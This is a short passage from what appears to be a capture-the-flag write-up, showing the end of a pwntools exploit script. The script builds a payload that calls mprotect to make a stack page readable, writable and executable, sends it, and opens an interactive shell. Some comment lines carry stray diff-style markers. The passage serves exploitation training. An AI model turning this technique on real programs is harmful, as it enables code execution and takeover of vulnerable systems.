RealJammy/ctf_framework/project/static/writeup/cyber2/cyber2_actual.md

 payload += p32(stack_end & -0x1000) # addr for the mprotect to make executable.
 Need to have a page-aligned value payload += p32(0x1000) # length for mprotect to change permission payload += p32(7) # permission to be set
-# Sending the payload

 p.sendline(payload)
-# Receving the printf line with lot of spaces for clean output
 p.recv()
-# Getting the shell
 p.interactive()
 p.close()
 ```